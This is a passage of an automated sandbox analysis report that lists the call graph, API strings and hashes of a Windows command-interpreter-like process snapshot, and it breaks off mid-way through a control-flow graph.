22064->21955 22069 7ff7823dc144 22065->22069 22082 7ff7823dc094 22065->22082 22067 7ff7823dc113 22066->22067 22068 7ff7823dc030 22066->22068 22079 7ff7823dff70 2 API calls 22067->22079 22080 7ff7823dc053 22067->22080 22070 7ff7823dc039 wcschr 22068->22070 22068->22080 22071 7ff7823dc151 22069->22071 22092 7ff7823dc1c8 22069->22092 22072 7ff7823dc301 22070->22072 22070->22080 22448 7ff7823dc460 22071->22448 22078 7ff7823dcd90 166 API calls 22072->22078 22073 7ff7823dc0c6 22077 7ff7823dc0cf wcschr 22073->22077 22087 7ff7823dc073 22073->22087 22074 7ff7823dc058 22085 7ff7823dff70 2 API calls 22074->22085 22074->22087 22076 7ff7823dc460 183 API calls 22076->22082 22083 7ff7823dc1be 22077->22083 22077->22087 22099 7ff7823dc30b 22078->22099 22079->22080 22080->22073 22080->22074 22089 7ff7823dc211 22080->22089 22082->22064 22082->22076 22084 7ff7823dcd90 166 API calls 22083->22084 22084->22092 22085->22087 22086 7ff7823dc460 183 API calls 22086->22064 22087->22064 22088 7ff7823dc460 183 API calls 22087->22088 22088->22087 22094 7ff7823dff70 2 API calls 22089->22094 22090 7ff7823dc285 22090->22089 22095 7ff7823db6b0 170 API calls 22090->22095 22091 7ff7823db6b0 170 API calls 22091->22080 22092->22064 22092->22089 22092->22090 22096 7ff7823dd840 178 API calls 22092->22096 22093 7ff7823dd840 178 API calls 22093->22099 22094->22064 22097 7ff7823dc2ac 22095->22097 22096->22092 22097->22087 22097->22089 22098 7ff7823dc3d4 22098->22087 22098->22089 22098->22091 22099->22064 22099->22089 22099->22093 22099->22098 22101 7ff7823dca40 17 API calls 22100->22101 22117 7ff7823db162 22101->22117 22102 7ff7823db2e1 22103 7ff7823db303 22102->22103 22104 7ff7823db2f7 ??_V@YAXPEAX 22102->22104 22106 7ff7823e8f80 7 API calls 22103->22106 22104->22103 22105 7ff7823db1d9 22109 7ff7823dcd90 166 API calls 22105->22109 22125 7ff7823db1ed 22105->22125 22108 7ff7823db315 22106->22108 22107 7ff7823e1ea0 8 API calls 22107->22117 22108->21959 22108->21973 22109->22125 22111 7ff7823ebfef _get_osfhandle SetFilePointer 22114 7ff7823ec01d 22111->22114 22111->22125 22112 7ff7823db228 _get_osfhandle 22113 7ff7823db23f _get_osfhandle 22112->22113 22112->22125 22113->22125 22116 7ff7823e33f0 _vsnwprintf 22114->22116 22115 7ff7823daffc _dup 22115->22125 22119 7ff7823ec038 22116->22119 22117->22102 22117->22105 22117->22107 22117->22117 22118 7ff7823e01b8 6 API calls 22118->22125 22124 7ff7823d3278 166 API calls 22119->22124 22120 7ff7823ec1c3 22121 7ff7823e33f0 _vsnwprintf 22120->22121 22121->22119 22122 7ff7823dd208 _close 22122->22125 22123 7ff7823e26e0 19 API calls 22123->22125 22126 7ff7823ec1f9 22124->22126 22125->22102 22125->22111 22125->22112 22125->22115 22125->22118 22125->22120 22125->22122 22125->22123 22127 7ff7823ec060 22125->22127 22129 7ff7823db038 _dup2 22125->22129 22130 7ff7823ec246 22125->22130 22131 7ff7823ec1a5 22125->22131 22136 7ff7823db356 22125->22136 22462 7ff7823ff318 _get_osfhandle GetFileType 22125->22462 22128 7ff7823daf98 2 API calls 22126->22128 22127->22130 22134 7ff7823e09f4 2 API calls 22127->22134 22128->22102 22129->22125 22132 7ff7823daf98 2 API calls 22130->22132 22133 7ff7823db038 _dup2 22131->22133 22135 7ff7823ec24b 22132->22135 22137 7ff7823ec1b7 22133->22137 22138 7ff7823ec084 22134->22138 22139 7ff7823ff1d8 166 API calls 22135->22139 22145 7ff7823daf98 2 API calls 22136->22145 22140 7ff7823ec1be 22137->22140 22141 7ff7823ec207 22137->22141 22142 7ff7823db900 166 API calls 22138->22142 22139->22102 22146 7ff7823dd208 _close 22140->22146 22144 7ff7823dd208 _close 22141->22144 22143 7ff7823ec08c 22142->22143 22147 7ff7823ec094 wcsrchr 22143->22147 22159 7ff7823ec0ad 22143->22159 22144->22136 22148 7ff7823ec211 22145->22148 22146->22120 22147->22159 22149 7ff7823e33f0 _vsnwprintf 22148->22149 22150 7ff7823ec22c 22149->22150 22151 7ff7823d3278 166 API calls 22150->22151 22151->22102 22152 7ff7823ec106 22153 7ff7823dff70 2 API calls 22152->22153 22155 7ff7823ec13b 22153->22155 22154 7ff7823ec0e0 _wcsnicmp 22154->22159 22155->22130 22156 7ff7823ec146 SearchPathW 22155->22156 22156->22130 22157 7ff7823ec188 22156->22157 22158 7ff7823e26e0 19 API calls 22157->22158 22158->22131 22159->22152 22159->22154 22161 7ff7823d7279 22160->22161 22163 7ff7823d7211 _setjmp 22160->22163 22161->21974 22163->22161 22164 7ff7823d7265 22163->22164 22463 7ff7823d72b0 22164->22463 22167 7ff7823dcb63 22166->22167 22168 7ff7823dcd90 166 API calls 22167->22168 22169 7ff7823dc848 22168->22169 22169->22023 22170 7ff7823dcad4 22169->22170 22171 7ff7823dcad9 22170->22171 22179 7ff7823dcb05 22170->22179 22172 7ff7823dcd90 166 API calls 22171->22172 22171->22179 22173 7ff7823ec722 22172->22173 22174 7ff7823ec72e GetConsoleTitleW 22173->22174 22173->22179 22175 7ff7823ec74a 22174->22175 22174->22179 22176 7ff7823db6b0 170 API calls 22175->22176 22181 7ff7823ec778 22176->22181 22177 7ff7823ec7ec 22178 7ff7823dff70 2 API calls 22177->22178 22178->22179 22179->22023 22180 7ff7823ec7dd SetConsoleTitleW 22180->22177 22181->22177 22181->22180 22183 7ff7823eecd4 GetLastError 22182->22183 22184 7ff7823e42ab UpdateProcThreadAttribute 22182->22184 22187 7ff7823eecee 22183->22187 22185 7ff7823eecf0 GetLastError 22184->22185 22186 7ff7823e42eb memset memset GetStartupInfoW 22184->22186 22279 7ff7823f9eec 22185->22279 22188 7ff7823e3a90 170 API calls 22186->22188 22190 7ff7823e43a8 22188->22190 22192 7ff7823db900 166 API calls 22190->22192 22193 7ff7823e43bb 22192->22193 22194 7ff7823e43cc 22193->22194 22195 7ff7823e4638 _local_unwind 22193->22195 22196 7ff7823e4415 22194->22196 22197 7ff7823e43de wcsrchr 22194->22197 22195->22194 22266 7ff7823e5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22196->22266 22197->22196 22198 7ff7823e43f7 lstrcmpW 22197->22198 22198->22196 22200 7ff7823e4668 22198->22200 22267 7ff7823f9044 22200->22267 22201 7ff7823e441a 22203 7ff7823e442a CreateProcessW 22201->22203 22204 7ff7823e4596 CreateProcessAsUserW 22201->22204 22205 7ff7823e448b 22203->22205 22204->22205 22206 7ff7823e4495 CloseHandle 22205->22206 22207 7ff7823e4672 GetLastError 22205->22207 22208 7ff7823e498c 8 API calls 22206->22208 22220 7ff7823e468d 22207->22220 22209 7ff7823e44c5 22208->22209 22212 7ff7823e44cd 22209->22212 22209->22220 22210 7ff7823e47a3 22210->22056 22211 7ff7823e44f8 22211->22210 22213 7ff7823e4612 22211->22213 22215 7ff7823e5cb4 7 API calls 22211->22215 22212->22210 22212->22211 22231 7ff7823fa250 33 API calls 22212->22231 22216 7ff7823e461c 22213->22216 22218 7ff7823e47e1 CloseHandle 22213->22218 22214 7ff7823dcd90 166 API calls 22217 7ff7823e4724 22214->22217 22219 7ff7823e4517 22215->22219 22222 7ff7823dff70 GetProcessHeap RtlFreeHeap 22216->22222 22221 7ff7823e472c _local_unwind 22217->22221 22226 7ff7823e473d 22217->22226 22218->22216 22223 7ff7823e33f0 _vsnwprintf 22219->22223 22220->22212 22220->22214 22221->22226 22224 7ff7823e47fa DeleteProcThreadAttributeList 22222->22224 22225 7ff7823e4544 22223->22225 22227 7ff7823e8f80 7 API calls 22224->22227 22228 7ff7823e498c 8 API calls 22225->22228 22232 7ff7823dff70 GetProcessHeap RtlFreeHeap 22226->22232 22229 7ff7823e4820 22227->22229 22230 7ff7823e4558 22228->22230 22229->22056 22233 7ff7823e4564 22230->22233 22234 7ff7823e47ae 22230->22234 22231->22211 22235 7ff7823e475b _local_unwind 22232->22235 22236 7ff7823e498c 8 API calls 22233->22236 22237 7ff7823e33f0 _vsnwprintf 22234->22237 22235->22212 22238 7ff7823e4577 22236->22238 22237->22213 22238->22216 22239 7ff7823e457f 22238->22239 22240 7ff7823fa920 210 API calls 22239->22240 22241 7ff7823e4584 22240->22241 22241->22216 22247 7ff7823d9737 22242->22247 22244 7ff7823d977d memset 22246 7ff7823dca40 17 API calls 22244->22246 22245 7ff7823dcd90 166 API calls 22245->22247 22246->22247 22247->22244 22247->22245 22248 7ff7823eb76e 22247->22248 22249 7ff7823eb7b3 22247->22249 22251 7ff7823db364 17 API calls 22247->22251 22258 7ff7823eb79a 22247->22258 22260 7ff7823d986d 22247->22260 22261 7ff7823d96b4 186 API calls 22247->22261 22281 7ff7823e1fac memset 22247->22281 22308 7ff7823dce10 22247->22308 22358 7ff7823e5920 22247->22358 22250 7ff7823d3278 166 API calls 22248->22250 22254 7ff7823eb787 22250->22254 22251->22247 22252 7ff7823e855c ??_V@YAXPEAX 22252->22249 22253 7ff7823eb795 22364 7ff7823f7694 22253->22364 22254->22253 22257 7ff7823fe944 393 API calls 22254->22257 22257->22253 22258->22252 22262 7ff7823d9880 ??_V@YAXPEAX 22260->22262 22263 7ff7823d988c 22260->22263 22261->22247 22262->22263 22264 7ff7823e8f80 7 API calls 22263->22264 22265 7ff7823d989d 22264->22265 22265->22056 22268 7ff7823e3a90 170 API calls 22267->22268 22269 7ff7823f9064 22268->22269 22270 7ff7823f9083 22269->22270 22271 7ff7823f906e 22269->22271 22273 7ff7823dcd90 166 API calls 22270->22273 22272 7ff7823e498c 8 API calls 22271->22272 22274 7ff7823f9081 22272->22274 22275 7ff7823f909b 22273->22275 22274->22196 22275->22274 22276 7ff7823e498c 8 API calls 22275->22276 22277 7ff7823f90ec 22276->22277 22278 7ff7823dff70 2 API calls 22277->22278 22278->22274 22280 7ff7823eed0a DeleteProcThreadAttributeList 22279->22280 22280->22187 22283 7ff7823e203b 22281->22283 22282 7ff7823e20b0 22284 7ff7823e3060 171 API calls 22282->22284 22286 7ff7823e211c 22282->22286 22283->22282 22285 7ff7823e2094 22283->22285 22284->22286 22287 7ff7823e20a6 22285->22287 22288 7ff7823d3278 166 API calls 22285->22288 22286->22287 22289 7ff7823e2e44 2 API calls 22286->22289 22290 7ff7823e8f80 7 API calls 22287->22290 22288->22287 22292 7ff7823e2148 22289->22292 22291 7ff7823e2325 22290->22291 22291->22247 22292->22287 22293 7ff7823e2d70 3 API calls 22292->22293 22294 7ff7823e21af 22293->22294 22295 7ff7823db900 166 API calls 22294->22295 22297 7ff7823e21d0 22295->22297 22296 7ff7823ee04a ??_V@YAXPEAX 22296->22287 22297->22296 22298 7ff7823e221c wcsspn 22297->22298 22307 7ff7823e22a4 ??_V@YAXPEAX 22297->22307 22300 7ff7823db900 166 API calls 22298->22300 22301 7ff7823e223b 22300->22301 22301->22296 22305 7ff7823e2252 22301->22305 22302 7ff7823e228f 22303 7ff7823dd3f0 223 API calls 22302->22303 22303->22307 22304 7ff7823ee06d wcschr 22304->22305 22305->22302 22305->22304 22306 7ff7823ee090 towupper 22305->22306 22306->22302 22306->22305 22307->22287 22346 7ff7823dd0f8 22308->22346 22350 7ff7823dce5b 22308->22350 22309 7ff7823e8f80 7 API calls 22312 7ff7823dd10a 22309->22312 22310 7ff7823ec860 22311 7ff7823ec97c 22310->22311 22314 7ff7823fee88 390 API calls 22310->22314 22313 7ff7823fe9b4 197 API calls 22311->22313 22312->22247 22316 7ff7823ec981 longjmp 22313->22316 22317 7ff7823ec879 22314->22317 22315 7ff7823e0494 182 API calls 22315->22350 22318 7ff7823ec99a 22316->22318 22319 7ff7823ec882 EnterCriticalSection LeaveCriticalSection 22317->22319 22320 7ff7823ec95c 22317->22320 22322 7ff7823ec9b3 ??_V@YAXPEAX 22318->22322 22318->22346 22324 7ff7823dd0e3 22319->22324 22320->22311 22325 7ff7823d96b4 186 API calls 22320->22325 22322->22346 22323 7ff7823dceaa _tell 22326 7ff7823dd208 _close 22323->22326 22324->22247 22325->22320 22326->22350 22327 7ff7823dcd90 166 API calls 22327->22350 22328 7ff7823ec9d5 22329 7ff7823fd610 167 API calls 22328->22329 22331 7ff7823ec9da 22329->22331 22330 7ff7823db900 166 API calls 22330->22350 22332 7ff7823eca07 22331->22332 22334 7ff7823fbfec 176 API calls 22331->22334 22333 7ff7823fe91c 198 API calls 22332->22333 22338 7ff7823eca0c 22333->22338 22335 7ff7823ec9f1 22334->22335 22336 7ff7823d3240 166 API calls 22335->22336 22336->22332 22337 7ff7823dcf33 memset 22337->22350 22338->22247 22339 7ff7823dca40 17 API calls 22339->22350 22340 7ff7823dd184 wcschr 22340->22350 22341 7ff7823fbfec 176 API calls 22341->22350 22342 7ff7823ec9c9 22344 7ff7823e855c ??_V@YAXPEAX 22342->22344 22343 7ff7823dd1a7 wcschr 22343->22350 22344->22346 22345 7ff7823f778c 166 API calls 22345->22350 22346->22309 22347 7ff7823e0a6c 273 API calls 22347->22350 22348 7ff7823dbe00 635 API calls 22348->22350 22349 7ff7823e3448 166 API calls 22349->22350 22350->22310 22350->22315 22350->22318 22350->22324 22350->22327 22350->22328 22350->22330 22350->22337 22350->22339 22350->22340 22350->22341 22350->22342 22350->22343 22350->22345 22350->22346 22350->22347 22350->22348 22350->22349 22351 7ff7823dcfab _wcsicmp 22350->22351 22352 7ff7823e0580 12 API calls 22350->22352 22356 7ff7823e1fac 238 API calls 22350->22356 22357 7ff7823dd044 ??_V@YAXPEAX 22350->22357 22370 7ff7823ddf60 22350->22370 22390 7ff7823fc738 22350->22390 22351->22350 22353 7ff7823dd003 GetConsoleOutputCP GetCPInfo 22352->22353 22354 7ff7823e04f4 3 API calls 22353->22354 22354->22350 22356->22350 22357->22350 22359 7ff7823e596c 22358->22359 22363 7ff7823e5a12 22358->22363 22360 7ff7823e598d VirtualQuery 22359->22360 22359->22363 22362 7ff7823e59ad 22360->22362 22360->22363 22361 7ff7823e59b7 VirtualQuery 22361->22362 22361->22363 22362->22361 22362->22363 22363->22247 22368 7ff7823f76a3 22364->22368 22365 7ff7823f76b7 22367 7ff7823fe9b4 197 API calls 22365->22367 22366 7ff7823d96b4 186 API calls 22366->22368 22369 7ff7823f76bc longjmp 22367->22369 22368->22365 22368->22366 22371 7ff7823ddf93 22370->22371 22372 7ff7823ddfe2 22370->22372 22371->22372 22373 7ff7823ddf9f GetProcessHeap RtlFreeHeap 22371->22373 22374 7ff7823de100 VirtualFree 22372->22374 22375 7ff7823de00b _setjmp 22372->22375 22373->22371 22373->22372 22374->22372 22376 7ff7823de0c3 22375->22376 22377 7ff7823de04a 22375->22377 22376->22323 22378 7ff7823de600 473 API calls 22377->22378 22379 7ff7823de073 22378->22379 22380 7ff7823de0e0 longjmp 22379->22380 22381 7ff7823de081 22379->22381 22383 7ff7823de0b0 22380->22383 22382 7ff7823dd250 475 API calls 22381->22382 22384 7ff7823de086 22382->22384 22383->22376 22400 7ff7823fd3fc 22383->22400 22384->22383 22387 7ff7823de600 473 API calls 22384->22387 22388 7ff7823de0a7 22387->22388 22388->22383 22389 7ff7823fd610 167 API calls 22388->22389 22389->22383 22391 7ff7823fc775 22390->22391 22398 7ff7823fc7ab 22390->22398 22392 7ff7823dcd90 166 API calls 22391->22392 22394 7ff7823fc781 22392->22394 22393 7ff7823fc8d4 22393->22350 22394->22393 22395 7ff7823db0d8 194 API calls 22394->22395 22395->22393 22396 7ff7823db6b0 170 API calls 22396->22398 22397 7ff7823db038 _dup2 22397->22398 22398->22393 22398->22394 22398->22396 22398->22397 22399 7ff7823dd208 _close 22398->22399 22399->22398 22411 7ff7823fd419 22400->22411 22401 7ff7823ecadf 22402 7ff7823e3448 166 API calls 22402->22411 22403 7ff7823fd592 22405 7ff7823e3448 166 API calls 22403->22405 22404 7ff7823fd5c4 22406 7ff7823e3448 166 API calls 22404->22406 22408 7ff7823fd5a5 22405->22408 22406->22401 22410 7ff7823fd5ba 22408->22410 22414 7ff7823e3448 166 API calls 22408->22414 22409 7ff7823fd546 22409->22404 22412 7ff7823fd555 22409->22412 22418 7ff7823fd36c 22410->22418 22411->22401 22411->22402 22411->22403 22411->22404 22411->22412 22413 7ff7823fd541 22411->22413 22416 7ff7823fd3fc 166 API calls 22411->22416 22425 7ff7823fd31c 22412->22425 22413->22403 22413->22404 22413->22409 22417 7ff7823fd589 22413->22417 22414->22410 22416->22411 22417->22403 22417->22412 22419 7ff7823fd381 22418->22419 22420 7ff7823fd3d8 22418->22420 22421 7ff7823e34a0 166 API calls 22419->22421 22424 7ff7823fd390 22421->22424 22422 7ff7823e3448 166 API calls 22422->22424 22423 7ff7823e34a0 166 API calls 22423->22424 22424->22420 22424->22422 22424->22423 22426 7ff7823e3448 166 API calls 22425->22426 22427 7ff7823fd33b 22426->22427 22428 7ff7823fd36c 166 API calls 22427->22428 22429 7ff7823fd343 22428->22429 22430 7ff7823fd3fc 166 API calls 22429->22430 22447 7ff7823fd34e 22430->22447 22431 7ff7823fd5c2 22431->22401 22432 7ff7823fd592 22434 7ff7823e3448 166 API calls 22432->22434 22433 7ff7823fd5c4 22435 7ff7823e3448 166 API calls 22433->22435 22437 7ff7823fd5a5 22434->22437 22435->22431 22436 7ff7823fd31c 166 API calls 22436->22431 22439 7ff7823fd5ba 22437->22439 22442 7ff7823e3448 166 API calls 22437->22442 22438 7ff7823fd546 22438->22433 22440 7ff7823fd555 22438->22440 22443 7ff7823fd36c 166 API calls 22439->22443 22440->22436 22441 7ff7823fd541 22441->22432 22441->22433 22441->22438 22445 7ff7823fd589 22441->22445 22442->22439 22443->22431 22444 7ff7823fd3fc 166 API calls 22444->22447 22445->22432 22445->22440 22446 7ff7823e3448 166 API calls 22446->22447 22447->22431 22447->22432 22447->22433 22447->22440 22447->22441 22447->22444 22447->22446 22449 7ff7823dc486 22448->22449 22450 7ff7823dc4c9 22448->22450 22451 7ff7823dc48e wcschr 22449->22451 22456 7ff7823dc161 22449->22456 22454 7ff7823dff70 2 API calls 22450->22454 22450->22456 22452 7ff7823dc4ef 22451->22452 22451->22456 22453 7ff7823dcd90 166 API calls 22452->22453 22455 7ff7823dc4f9 22453->22455 22454->22456 22455->22456 22459 7ff7823dc5bd 22455->22459 22460 7ff7823dd840 178 API calls 22455->22460 22461 7ff7823dc541 22455->22461 22456->22064 22456->22086 22457 7ff7823dff70 2 API calls 22457->22456 22458 7ff7823db6b0 170 API calls 22458->22461 22459->22458 22459->22461 22460->22455 22461->22456 22461->22457 22462->22125 22464 7ff7823f4621 22463->22464 22465 7ff7823d72de 22463->22465 22467 7ff7823f447b longjmp 22464->22467 22472 7ff7823f4639 22464->22472 22488 7ff7823f47e0 22464->22488 22498 7ff7823f475e 22464->22498 22466 7ff7823d72eb 22465->22466 22470 7ff7823f4530 22465->22470 22471 7ff7823f4467 22465->22471 22524 7ff7823d7348 22466->22524 22473 7ff7823f4492 22467->22473 22468 7ff7823d7348 168 API calls 22523 7ff7823f4524 22468->22523 22478 7ff7823d7348 168 API calls 22470->22478 22471->22466 22471->22473 22483 7ff7823f4475 22471->22483 22476 7ff7823f4695 22472->22476 22485 7ff7823f463e 22472->22485 22477 7ff7823d7348 168 API calls 22473->22477 22475 7ff7823d7315 22539 7ff7823d73d4 22475->22539 22482 7ff7823d73d4 168 API calls 22476->22482 22494 7ff7823f44a8 22477->22494 22496 7ff7823f4549 22478->22496 22479 7ff7823d72b0 168 API calls 22486 7ff7823f480e 22479->22486 22480 7ff7823d7348 168 API calls 22480->22475 22504 7ff7823f469a 22482->22504 22483->22467 22483->22476 22484 7ff7823d7348 168 API calls 22484->22488 22485->22467 22489 7ff7823f4654 22485->22489 22486->22161 22487 7ff7823d7323 22487->22161 22488->22468 22497 7ff7823d7348 168 API calls 22489->22497 22490 7ff7823f45b2 22492 7ff7823d7348 168 API calls 22490->22492 22491 7ff7823f46e1 22499 7ff7823d72b0 168 API calls 22491->22499 22500 7ff7823f45c7 22492->22500 22493 7ff7823f455e 22493->22490 22505 7ff7823d7348 168 API calls 22493->22505 22495 7ff7823f44e2 22494->22495 22501 7ff7823d7348 168 API calls 22494->22501 22502 7ff7823d72b0 168 API calls 22495->22502 22496->22490 22496->22493 22512 7ff7823d7348 168 API calls 22496->22512 22497->22487 22498->22484 22503 7ff7823f4738 22499->22503 22506 7ff7823d7348 168 API calls 22500->22506 22501->22495 22507 7ff7823f44f1 22502->22507 22508 7ff7823d7348 168 API calls 22503->22508 22504->22491 22515 7ff7823f46ea 22504->22515 22516 7ff7823f46c7 22504->22516 22505->22490 22509 7ff7823f45db 22506->22509 22511 7ff7823d72b0 168 API calls 22507->22511 22508->22523 22510 7ff7823d7348 168 API calls 22509->22510 22513 7ff7823f45ec 22510->22513 22514 7ff7823f4503 22511->22514 22512->22493 22518 7ff7823d7348 168 API calls 22513->22518 22514->22487 22520 7ff7823d7348 168 API calls 22514->22520 22517 7ff7823d7348 168 API calls 22515->22517 22516->22491 22521 7ff7823d7348 168 API calls 22516->22521 22517->22491 22519 7ff7823f4600 22518->22519 22522 7ff7823d7348 168 API calls 22519->22522 22520->22523 22521->22491 22522->22523 22523->22479 22523->22487 22526 7ff7823d735d 22524->22526 22525 7ff7823d3278 166 API calls 22527 7ff7823f4820 longjmp 22525->22527 22526->22525 22526->22526 22528 7ff7823f4838 22526->22528 22538 7ff7823d73ab 22526->22538 22527->22528 22529 7ff7823d3278 166 API calls 22528->22529 22530 7ff7823f4844 longjmp 22529->22530 22531 7ff7823f485a 22530->22531 22532 7ff7823d7348 166 API calls 22531->22532 22533 7ff7823f487b 22532->22533 22534 7ff7823d7348 166 API calls 22533->22534 22535 7ff7823f48ad 22534->22535 22536 7ff7823d7348 166 API calls 22535->22536 22537 7ff7823d72ff 22536->22537 22537->22475 22537->22480 22540 7ff7823d7401 22539->22540 22540->22487 22541 7ff7823d7348 168 API calls 22540->22541 22542 7ff7823f487b 22541->22542 22543 7ff7823d7348 168 API calls 22542->22543 22544 7ff7823f48ad 22543->22544 22545 7ff7823d7348 168 API calls 22544->22545 22546 7ff7823f48be 22545->22546 22546->22487
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                  • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                  • API String ID: 3305344409-4288247545
                                                                                                  • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                  • Instruction ID: f1fc7b43091ccaca5fd533c30268ff22d908fca2381e32a1fa5fffd121b7dbd5
                                                                                                  • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                  • Instruction Fuzzy Hash: 55421A25A0868295EB50BB11D8202B9E7A0FF85B96FE44178DD5E57FD4DFBCE848C320

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 216 7ff7823daa54-7ff7823daa98 call 7ff7823dcd90 219 7ff7823daa9e 216->219 220 7ff7823ebf5a-7ff7823ebf70 call 7ff7823e4c1c call 7ff7823dff70 216->220 222 7ff7823daaa5-7ff7823daaa8 219->222 223 7ff7823dacde-7ff7823dad00 222->223 224 7ff7823daaae-7ff7823daac8 wcschr 222->224 229 7ff7823dad06 223->229 224->223 226 7ff7823daace-7ff7823daae9 towlower 224->226 226->223 228 7ff7823daaef-7ff7823daaf3 226->228 231 7ff7823ebeb7-7ff7823ebec4 call 7ff7823feaf0 228->231 232 7ff7823daaf9-7ff7823daafd 228->232 233 7ff7823dad0d-7ff7823dad1f 229->233 248 7ff7823ebec6-7ff7823ebed8 call 7ff7823d3240 231->248 249 7ff7823ebf43-7ff7823ebf59 call 7ff7823e4c1c 231->249 235 7ff7823dab03-7ff7823dab07 232->235 236 7ff7823ebbcf 232->236 237 7ff7823dad22-7ff7823dad2a call 7ff7823e13e0 233->237 239 7ff7823dab7d-7ff7823dab81 235->239 240 7ff7823dab09-7ff7823dab0d 235->240 243 7ff7823ebbde 236->243 237->222 244 7ff7823ebe63 239->244 245 7ff7823dab87-7ff7823dab95 239->245 240->244 246 7ff7823dab13-7ff7823dab17 240->246 255 7ff7823ebbea-7ff7823ebbec 243->255 258 7ff7823ebe72-7ff7823ebe88 call 7ff7823d3278 call 7ff7823e4c1c 244->258 250 7ff7823dab98-7ff7823daba0 245->250 246->239 251 7ff7823dab19-7ff7823dab1d 246->251 248->249 263 7ff7823ebeda-7ff7823ebee9 call 7ff7823d3240 248->263 249->220 250->250 256 7ff7823daba2-7ff7823dabb3 call 7ff7823dcd90 250->256 251->243 257 7ff7823dab23-7ff7823dab27 251->257 264 7ff7823ebbf8-7ff7823ebc01 255->264 256->220 270 7ff7823dabb9-7ff7823dabde call 7ff7823e13e0 call 7ff7823e33a8 256->270 257->255 261 7ff7823dab2d-7ff7823dab31 257->261 284 7ff7823ebe89-7ff7823ebe8c 258->284 261->229 266 7ff7823dab37-7ff7823dab3b 261->266 273 7ff7823ebef3-7ff7823ebef9 263->273 274 7ff7823ebeeb-7ff7823ebef1 263->274 264->233 266->264 271 7ff7823dab41-7ff7823dab45 266->271 308 7ff7823dabe4-7ff7823dabe7 270->308 309 7ff7823dac75 270->309 276 7ff7823ebc06-7ff7823ebc2a call 7ff7823e13e0 271->276 277 7ff7823dab4b-7ff7823dab4f 271->277 273->249 279 7ff7823ebefb-7ff7823ebf0d call 7ff7823d3240 273->279 274->249 274->273 295 7ff7823ebc2c-7ff7823ebc4c _wcsnicmp 276->295 296 7ff7823ebc5a-7ff7823ebc61 276->296 282 7ff7823dab55-7ff7823dab78 call 7ff7823e13e0 277->282 283 7ff7823dad2f-7ff7823dad33 277->283 279->249 306 7ff7823ebf0f-7ff7823ebf21 call 7ff7823d3240 279->306 282->222 290 7ff7823ebc66-7ff7823ebc8a call 7ff7823e13e0 283->290 291 7ff7823dad39-7ff7823dad3d 283->291 285 7ff7823ebe92-7ff7823ebeaa call 7ff7823d3278 call 7ff7823e4c1c 284->285 286 7ff7823dacbe 284->286 337 7ff7823ebeab-7ff7823ebeb6 call 7ff7823e4c1c 285->337 301 7ff7823dacc0-7ff7823dacc7 286->301 325 7ff7823ebcc4-7ff7823ebcdc 290->325 326 7ff7823ebc8c-7ff7823ebcaa _wcsnicmp 290->326 298 7ff7823dad43-7ff7823dad49 291->298 299 7ff7823ebcde-7ff7823ebd02 call 7ff7823e13e0 291->299 295->296 307 7ff7823ebc4e-7ff7823ebc55 295->307 312 7ff7823ebd31-7ff7823ebd4f _wcsnicmp 296->312 310 7ff7823dad4f-7ff7823dad68 298->310 311 7ff7823ebd5e-7ff7823ebd65 298->311 329 7ff7823ebd04-7ff7823ebd24 _wcsnicmp 299->329 330 7ff7823ebd2a 299->330 301->301 303 7ff7823dacc9-7ff7823dacda 301->303 303->223 306->249 339 7ff7823ebf23-7ff7823ebf35 call 7ff7823d3240 306->339 320 7ff7823ebbb3-7ff7823ebbb7 307->320 308->286 322 7ff7823dabed-7ff7823dac0b call 7ff7823dcd90 * 2 308->322 317 7ff7823dac77-7ff7823dac7f 309->317 323 7ff7823dad6d-7ff7823dad70 310->323 324 7ff7823dad6a 310->324 311->310 321 7ff7823ebd6b-7ff7823ebd73 311->321 318 7ff7823ebd55 312->318 319 7ff7823ebbc2-7ff7823ebbca 312->319 317->286 336 7ff7823dac81-7ff7823dac85 317->336 318->311 319->222 331 7ff7823ebbba-7ff7823ebbbd call 7ff7823e13e0 320->331 332 7ff7823ebd79-7ff7823ebd8b iswxdigit 321->332 333 7ff7823ebe4a-7ff7823ebe5e 321->333 322->337 356 7ff7823dac11-7ff7823dac14 322->356 323->237 324->323 325->312 326->325 327 7ff7823ebcac-7ff7823ebcbf 326->327 327->320 329->330 338 7ff7823ebbac 329->338 330->312 331->319 332->333 342 7ff7823ebd91-7ff7823ebda3 iswxdigit 332->342 333->331 340 7ff7823dac88-7ff7823dac8f 336->340 337->231 338->320 339->249 357 7ff7823ebf37-7ff7823ebf3e call 7ff7823d3240 339->357 340->340 348 7ff7823dac91-7ff7823dac94 340->348 342->333 345 7ff7823ebda9-7ff7823ebdbb iswxdigit 342->345 345->333 353 7ff7823ebdc1-7ff7823ebdd7 iswdigit 345->353 348->286 352 7ff7823dac96-7ff7823dacaa wcsrchr 348->352 352->286 358 7ff7823dacac-7ff7823dacb9 call 7ff7823e1300 352->358 354 